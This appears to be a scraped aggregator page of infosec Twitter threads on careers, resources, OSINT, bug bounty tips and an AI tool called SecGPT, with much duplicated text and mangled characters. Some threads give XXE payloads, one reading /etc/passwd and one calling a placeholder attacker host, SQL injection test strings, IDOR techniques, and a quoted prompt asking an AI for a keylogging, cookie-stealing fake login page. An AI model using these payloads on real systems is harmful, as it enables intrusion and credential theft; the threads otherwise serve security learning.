Discover and read the best of Twitter Threads about #infosec
Most recents (24)
20 FREE Cybersecurity Certifications to Add to Resume/CV
From Noob to Pentesting Clients in 2023 π 
1. Be laser focused to become l33t. Cybersecurity is a large field and you can't be an expert of everything.
2. Let's say you choose application security. Here's how I would skill up really fast.
HTTP Parameter Pollution @SecGPT has seen in its training.
1. ATO via password reset
The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
The attacker manipulates the HTTP parameters of the password reset page to change the email address associated with the account; then use the password reset link => ATO.
2. Price manipulation in e-commerce platforms
The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
The attacker manipulates the HTTP parameters of an e-commerce website to change the price of a product. The attacker can then purchase the product at a lower price than intended.
πππ₯π°ππ«π ππ§π πππ―ππ«π¬π ππ§π π’π§πππ«π’π§π ππ¨π§πππ§ππ¬ π’
#infosec #Hacking #redteam
#malware #ReverseEngineering
#RE
Awesome Malware and Reverse Engineering
lnkd.in/dZFy_k6d
lnkd.in/dZh9hbpq
#infosec #Hacking #redteam
#malware #ReverseEngineering
#RE
Awesome Malware and Reverse Engineering
lnkd.in/dZFy_k6d
lnkd.in/dZh9hbpq
Awesome Reverse Engineering
lnkd.in/etvePWr
lnkd.in/dh25YEkn
lnkd.in/daEcJEJ9
lnkd.in/ds88s46R
Awesome Malware Analysis
lnkd.in/dh_tMmyY
lnkd.in/e3KJ7rC
lnkd.in/dbn94MUW
lnkd.in/etvePWr
lnkd.in/dh25YEkn
lnkd.in/daEcJEJ9
lnkd.in/ds88s46R
Awesome Malware Analysis
lnkd.in/dh_tMmyY
lnkd.in/e3KJ7rC
lnkd.in/dbn94MUW
Malware API
malapi.io
lnkd.in/djqeN7RS
Malware Analysis and Reverse Engineering
lnkd.in/dXjFkZ7a
Retoolkit
lnkd.in/dwn8bRi3
Malware Bazar
bazaar.abuse.ch
Malware Analysis Journey
lnkd.in/d9B6UGQ8
malapi.io
lnkd.in/djqeN7RS
Malware Analysis and Reverse Engineering
lnkd.in/dXjFkZ7a
Retoolkit
lnkd.in/dwn8bRi3
Malware Bazar
bazaar.abuse.ch
Malware Analysis Journey
lnkd.in/d9B6UGQ8
ππExciting news! SecGPT is now LIVE!
Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.π
Trained on thousands of cybersecurity reports, SecGPT revolutionizes cybersecurity with AI-driven insights.π
1. Trained on an extensive collection of cybersecurity reports, @SecGPT provides you with a deeper understanding of vulnerabilities, exploitation techniques, and emerging trends in cybersecurity.
Its knowledge increases as more reports and writeups are published.
Its knowledge increases as more reports and writeups are published.
2. Explore SecGPT's capabilities and see how it can assist you in enhancing your cybersecurity expertise.
Try it out for free at alterai.me
#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
Try it out for free at alterai.me
#ai #cybersecurity #infosec #pentesting #ethicalhacking #bugbounty #bugbountytips #secgpt
CAN I BE HACKED VIA BLUETOOTH?
Yes,
Once a Device is βBluebuggedβ, the Hacker can access the target device, steal and modify device data, listen to calls, and read messages.
A thread
Yes,
Once a Device is βBluebuggedβ, the Hacker can access the target device, steal and modify device data, listen to calls, and read messages.
A thread
What is a Bluetooth Attack?
This is a form of Hacking Technique that allows the attacker access to a device with a Bluetooth discoverable connection or when a Bluetooth technology is left on
This is a form of Hacking Technique that allows the attacker access to a device with a Bluetooth discoverable connection or when a Bluetooth technology is left on
Types of Bluetooth Attacks
Β· Bluesnarf Attack
Β· Man-in-The Middle (MiTM) Attack
Β· BlueJacking
Β· BlueSmacking (DoS Attack)
Β· BluePrinting Attack
Β· BlueBugging
Β· Bluesnarf Attack
Β· Man-in-The Middle (MiTM) Attack
Β· BlueJacking
Β· BlueSmacking (DoS Attack)
Β· BluePrinting Attack
Β· BlueBugging
Boost your pentesting and bug bounty game with SecGPT's AI insights from thousands of online security reports.
I've asked it for some XXE payloads found in the reports.
I've asked it for some XXE payloads found in the reports.
1. Basic XXE payload
`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
`<!DOCTYPE foo [<!ELEMENT foo ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>`
2. Blind XXE payload
`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
`<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attackerdomain/xxe.dtd">%xxe;]><foo></foo>`
Unlocking the Secrets: Breaking Access Controls, the basics π
(from the AI model I'm currently training on security reports)
(from the AI model I'm currently training on security reports)
1. Direct object reference
This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
This occurs when an attacker is able to access a resource directly by manipulating a parameter in the URL or form data.
2. Horizontal privilege escalation
This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
This occurs when an attacker is able to access resources or perform actions that are intended for another user with the same level of access.
Often times to simplify my work I build scripts.π
I recently discovered katana by @pdiscoveryio. And I turned this:
katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"
into this:
kata <tld>
I recently discovered katana by @pdiscoveryio. And I turned this:
katana -d 5 -c 50 -p 20 -ef "ttf,woff,svg,jpeg,jpg,png,ico,gif,css" -u <https://tld> -cs "regex-to-restrict-to-tld-and-subdomains"
into this:
kata <tld>
1. The long command does the following:
-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
-d => depth 5
-c => concurrency 50
-p => threads in parallel 20
-ef => exclude these
-u => supply the top level domain (i.e. twitter.com)
-cs => scope for this regex (limited to the tld and its subdomains)
2. You can download the kata bash script from my repo below. Use it as:
kata <tld>
Do me a favor and star the repo, thanks!
#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips
github.com/CristiVlad25/sβ¦
kata <tld>
Do me a favor and star the repo, thanks!
#pentesting #infosec #cybersecurity #ethicalhacking #bugbounty #bugbountytips
github.com/CristiVlad25/sβ¦
π¨Security Career Resource Thread π¨
1οΈβ£ 2οΈβ£ resources to break into the field or take your career to the next level π
#infosec #cybersecurity #security
1οΈβ£ 2οΈβ£ resources to break into the field or take your career to the next level π
#infosec #cybersecurity #security
Learn:
π How to get into various fields: pentesting, SOC analyst, AppSec, ...
π« Certs - do they matter? For which roles?
π§ͺ Doing security research
π£ Building your brand via blog posts, conference talks, and more
πΈ How to think about compensation
π How to get into various fields: pentesting, SOC analyst, AppSec, ...
π« Certs - do they matter? For which roles?
π§ͺ Doing security research
π£ Building your brand via blog posts, conference talks, and more
πΈ How to think about compensation
πΊ Launch your cybersecurity career: @IppSec's advice on how to become a skilled professional
* Technical tips
* Keeping a positive mindset
* Life is what you make it
#bugbounty #bugbountytips
* Technical tips
* Keeping a positive mindset
* Life is what you make it
#bugbounty #bugbountytips
As much as I love automation in recon, 98% of the findings in my pentests have nothing to do with it. Why? π
1. Inspired by @NahamSec recent video.
First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
First, in a large majority of the web pentests, clients want me to focus only on their app and it's features. So, there's no need for subdomain enumeration/bruteforcing or any other large recon tactic.
2. This doesn't mean that I don't use automation. I automate some of the boring and repetitive tasks via bash and python.
7 Steps to Take When Pivoting into the Cybersecurity Industry
1. Acquire the fundamental knowledge. This can be achieved via Certifications and Online Courses
2. Improve your Hands-On Skills. Experiment on onsite or offsite environments.
2. Improve your Hands-On Skills. Experiment on onsite or offsite environments.
3. Build a great Portfolio. Work on personal and collective projects, improve your writing and documenting skills,Participate in hackathons and CTFs and so on.
π§΅Thread: "Discovering the Hidden World with Geomint"
Hey OSINT PUNKs! Are you ready to take your investigative skills to the next level? It's time to discover the hidden world with Geomint! ππ΅οΈββοΈ
#OSINT #infosec #GEOMINT
Hey OSINT PUNKs! Are you ready to take your investigative skills to the next level? It's time to discover the hidden world with Geomint! ππ΅οΈββοΈ
#OSINT #infosec #GEOMINT
So what exactly is Geomint? It's the art of using geolocation data to gather intelligence about people, places, and events. With Geomint, you can uncover valuable information that may be hidden in plain sight.
There are many tools available for Geomint, and we've compiled a list of some of the best ones to get you started:
More practice, less theory (but not 0 theory)
In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.
My point was not understood and I got a lot of hate for it.
In the past, I criticized Top 1% THM who know close to nothing about the real-world aspects of a pentest.
My point was not understood and I got a lot of hate for it.
1. Again, there's less value in being Top 1% if your experience is purely theoretical.
Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
Yet, you will go way further if you complement your experience (from day-to-day work in cybersecurity) with continuous practice on THM and other platforms (focusing on non-CTFish materials).
2. If you're not working in cybersecurity yet, but you want to, no problem.
Get your daily real-world experience from VDPs (and not paid bounties).
Get your daily real-world experience from VDPs (and not paid bounties).
In 1998, two Stanford students published "The Anatomy of a Large-Scale Hypertextual Web Search Engine," in which they wrote, "Advertising funded search engines will be inherently biased towards the advertisers and away from the needs of consumers."
research.google/pubs/pub334/ 1/
research.google/pubs/pub334/ 1/
If you'd like an essay-formatted version of this thread to read or share, here's a link to it on pluralistic.net, my surveillance-free, ad-free, tracker-free blog:
pluralistic.net/2023/02/24/pas⦠2/
pluralistic.net/2023/02/24/pas⦠2/
The co-authors were Lawrence Page and Sergey Brin, and the "large-scale hypertextual web search-engine" they were describing was their new project, which they called "#Google." They were 100% correct - prescient, even! 3/
π§΅
Today marks the first anniversary of the Russia-Ukraine #cyberwar that killed <checks Microsoft's & Mandiant's reports> no one.
Let's go over last year's mass cyberwar #panic. We'll begin with one of the earliest calls to #boycott @Kaspersky:
Today marks the first anniversary of the Russia-Ukraine #cyberwar that killed <checks Microsoft's & Mandiant's reports> no one.
Let's go over last year's mass cyberwar #panic. We'll begin with one of the earliest calls to #boycott @Kaspersky:
There was an immediate feeling that everyone must cancel all Kaspersky subscriptions, as if customers -- especially corporate clients -- had a competitor's product waiting in the wings to replace it in some trivial fashion:
Likewise, there was an immediate plea to [translated] "remove Kaspersky from your PC. Now. Immediately." Again, as if customers -- especially corporate clients -- could do it trivially and without serious consequences:
Grow your cybersecurity skills with this incredible collection of FREE learning resources.
β‘οΈ Get ready to level up!
Follow & share the π§΅
#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
β‘οΈ Get ready to level up!
Follow & share the π§΅
#infosec #cybersecurity #pentesting #bugbounty
#hacking #blueteam #redteam #technology #DataSecurity #CyberSec #Linux#soc #dfir
Learn Cybersecurity for FREE on YouTube.
Here are 12 pages to check out
Here are 12 pages to check out
1 Network Chuck- Everything Cybersecurity related
2 Outpost Gray- Cybersecurity Carer Dev
3 The XSS Rat- Bounty Hunting
4 Cyrill Gossi- Cryptography Videos
5 Cyberspatial- Cybersecurity Education and Training
6 Bugcrowd- Bug Bounty Interviews and Methodology
2 Outpost Gray- Cybersecurity Carer Dev
3 The XSS Rat- Bounty Hunting
4 Cyrill Gossi- Cryptography Videos
5 Cyberspatial- Cybersecurity Education and Training
6 Bugcrowd- Bug Bounty Interviews and Methodology
7 Professor Messer- Guides covering Certifications
8 Black Hat- Cybersecurity Technical Conferences
9 Hak5- Everything Cybersecurity
10 Infosec Institute- Cybersecurity Awareness
11 HackerSploit- Pen Test and Web App Hacking
8 Black Hat- Cybersecurity Technical Conferences
9 Hak5- Everything Cybersecurity
10 Infosec Institute- Cybersecurity Awareness
11 HackerSploit- Pen Test and Web App Hacking
Looking to kickstart your career in cybersecurity?
You can do it all with FREE resources and a clear step-by-step path
Here is How π§΅
#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
You can do it all with FREE resources and a clear step-by-step path
Here is How π§΅
#infosec #cybersecurity #pentesting #oscp @tryhackme #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Linux
1οΈβ£ Level - Introduction to OpenVPN
π °οΈ OpenVPN: How to Connect
-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS
The room is free complete it.π
tryhackme.com/room/openvpn
π °οΈ OpenVPN: How to Connect
-OpenVPN - Windows
-OpenVPN - Linux
-OpenVPN - MacOS
The room is free complete it.π
tryhackme.com/room/openvpn
2οΈβ£ Introductory Research Walkthrough
Here you will learn
- How to research
- How to search for vulnerabilities
The room is free complete it.π
tryhackme.com/room/introtoreβ¦
Here you will learn
- How to research
- How to search for vulnerabilities
The room is free complete it.π
tryhackme.com/room/introtoreβ¦
XSS PoC - AI Generated:
1. platform.openai.com/codex-javascriβ¦
2. Prompt w/ description
3. Export to JSFiddle
4. Host it
5. Include external script
6. Escalate your alert()
#bugbountytips #infosec #xss #ai #GPT
π𧡠for Prompt & Code
1. platform.openai.com/codex-javascriβ¦
2. Prompt w/ description
3. Export to JSFiddle
4. Host it
5. Include external script
6. Escalate your alert()
#bugbountytips #infosec #xss #ai #GPT
π𧡠for Prompt & Code
My prompt:
make a fake login page that's a keylogger and grabs cookies with some styling to make it look like a real login page
make a fake login page that's a keylogger and grabs cookies with some styling to make it look like a real login page
XSS PoC JS
Today's quick #malware analysis with #SecurityOnion: FAKEBAT, REDLINE STEALER, and GOZI/ISFB/URSNIF pcap from 2023-02-03!
Thanks to @malware_traffic for sharing this pcap!
More screenshots:
blog.securityonion.net/2023/02/quick-β¦
#infosec
#infosecurity
#ThreatHunting
#IncidentResponse
Thanks to @malware_traffic for sharing this pcap!
More screenshots:
blog.securityonion.net/2023/02/quick-β¦
#infosec
#infosecurity
#ThreatHunting
#IncidentResponse
@malware_traffic Let's review some of the data that #SecurityOnion generates from this traffic!
When you import the pcap using so-import-pcap, it will generate a hyperlink that will take you to the Overview dashboard:
When you import the pcap using so-import-pcap, it will generate a hyperlink that will take you to the Overview dashboard:
@malware_traffic Here are the NIDS alerts:
Top IDOR ( Insecure direct object reference)
Thread π§΅:π(1/12) Here is how to find IDOR all possible methods
" IDOR is a low hanging fruit which takes no skill with higher bounty" - can bypass payment , PII leak and want not π
#BugBounty #bugbountytips #infosec #IDOR
Thread π§΅:π(1/12) Here is how to find IDOR all possible methods
" IDOR is a low hanging fruit which takes no skill with higher bounty" - can bypass payment , PII leak and want not π
#BugBounty #bugbountytips #infosec #IDOR
1) IDOR to delete images from other stores profile pic
a) facebook IDOR image delete - shorturl.at/fmsyY
b) hackerone report id -404797
a) facebook IDOR image delete - shorturl.at/fmsyY
b) hackerone report id -404797
2) Is the ID encoded or not in plaintext?
- change the setting of user by changing there id id on base64 H1 report id - 291721
3) Can a file/resource be accessed directly from the url, without needing prior authentication?
-H1 258260, 230870, 126861
- change the setting of user by changing there id id on base64 H1 report id - 291721
3) Can a file/resource be accessed directly from the url, without needing prior authentication?
-H1 258260, 230870, 126861
(1/6) To all investigators out there who have heard of #Maltego before, but still looking for more information. Here's what you need to know about Maltego π #OSINT #infosec
(2/6) #Maltego is a link analysis tool that helps you automatically pull and map data from over 70 public data sources (#OSINT) and third-party data providers, and your own imported or custom data integrations. All of this done with a few clicks on the mouse in one interface.
(3/6) You start by providing input information for your investigation (name, alias, domain, IP address, etc.), install the data integrations you want to use, and #Maltego will retrieve relevant Entities from the data integrations and visualize the data connections between them.
More SQLi tips.
1. Append a ' or " to a valid param value.
2. If the response changes, replace the ' or " with each of these in turn (sub ' with " as needed):
' '
'||'
'+'
3. If you get the original response back, you likely have SQLi.
#bugbountytips #Cybersecurity #InfoSec
1. Append a ' or " to a valid param value.
2. If the response changes, replace the ' or " with each of these in turn (sub ' with " as needed):
' '
'||'
'+'
3. If you get the original response back, you likely have SQLi.
#bugbountytips #Cybersecurity #InfoSec
I call this the "break and repair" method. Your initial ' or " breaks the statement syntax.
The 3 values in step 2 are "repairs". They change your initial break into a valid concatenation with an empty string, which results in the original value (and response).
The 3 values in step 2 are "repairs". They change your initial break into a valid concatenation with an empty string, which results in the original value (and response).
Once you have a potential SQLi, you can use boolean logic to confirm it.
Replace your repair with:
' AND '1'='1
' AND '1'='2
The first should get the same response as the initial (non-SQLi) value. The second should not.
Replace your repair with:
' AND '1'='1
' AND '1'='2
The first should get the same response as the initial (non-SQLi) value. The second should not.
